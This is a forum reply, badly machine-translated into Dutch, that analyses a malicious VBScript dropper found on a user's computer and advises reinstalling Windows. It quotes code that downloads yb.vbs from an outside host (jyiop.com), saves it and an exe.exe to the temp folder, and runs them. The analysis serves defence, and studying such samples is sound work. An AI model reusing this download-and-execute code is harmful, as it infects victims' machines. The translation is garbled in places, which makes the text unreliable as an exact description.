Ik ben niet bereid om zover als het openen van de websites te gaan u nochtans vermeldde, van de manuscripten hierboven hier is wat ik… zie
Manuscript 1 leidt tot een leeg dossier, verbindingen aan een website en downloads de inhoud van de pagina en stortplaatsen het in het lege dossier. Dit dossier wordt opgeslagen als „yb.vbs“ en is verondersteld om uit te voeren.
B= " yb.vbs "
Met CreateObject („MSXML2.XMLHTTP
“)
.open „KRIJGEN“, „
http://jyiop.com/kr/yb.vbs“, vals
.send ()
Plaats A = CreateObject („Scripting.FileSystemObject
“)
Plaats D = A.CreateTextFile (A.GetSpecialFolder
(
2) + „\“ + B)
D.WriteLine .responseText
Eind met
D.Close
CreateObject („WScript.Shell
“). Looppas A.GetSpecialFolder (2) +“ \ „+ B
Stap 2 nu het vbsdossier en looppas is gecre�ërd, het probeert om een andere webpage te bezoeken maar dit keer bewaart de Web-pagina inhoud in een dossier genoemd „exe.exe“. Dit nieuwe dossier moet in de omslag van gebruikerstemperaturen worden opgeslagen.
Het manuscript stelt dan het dossier „exe.exe“ in werking.
Zoals u vermeldde, taskkill houdt de speler van de Media van Vensters tegen - waarom, die?!? het weet!
Het manuscript schrapt dan het vbmanuscript dat gecre�ërde 1 stapt (het manuscript dat momenteel loopt).
Er is een seconde 3 wacht dan het dossier „exe.exe“ wordt geschrapt.
Dit deel;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Als c.Status = x toen
u=c.ResponseBody: d.Open: d.Type
= y: d.Write u: d.SaveToFile B: d.Close]
is manuscript het typen om een dossier te openen dat in webpage - niets zal stromen met Adobe te doen. „c.Status“ - het manuscript wacht op webpage klaar en geschikt te zijn te downloaden. „u=c.ResponseBody“ neemt de Web-pagina en stopt het in een variabele. De stroom wordt geopend en de tekst wordt gedownload in de variabele. Het dossier wordt opgeslagen en gesloten. In dit manuscript worden webpage/het dossier opgeslagen in de temperaturenomslag als „exe.exe“.
Het echte gevaar is dat dossier „exe.exe“. Zodra het in werking is gesteld, niemand kan zeggen wat het werd ontworpen om te doen.
Die computer is nog besmet met een virus. Het programma „exe.exe“ kon andere virussen op de achtergrond gedownload hebben om aftasten van het systeem te belemmeren. Het feit dat u het open bevelvenster kunt zien en het manuscript om wordt geprobeerd te lopen daar vertelt me is één of ander kwaadwillig dossier nog treuzelend.
Het kan tijd zijn om te evalueren wat van die machine moet worden bewaard en het begin opnieuw met van Vensters en toepassingen opnieuw installeert. Het klinkt dramatisch maar ziend zoals antivirus niet ontdekt om het even wat uit soorten die ik bent u op het punt van geen terugkeer heb gedacht. Herinner dat zolang de kwaadwillige code daar, om het even welke aandrijving is; zij het USB kunnen de geheugenstok, de camera enz., het virus potentieel bevatten/trojan, als het werd vastgemaakt aan de machine.
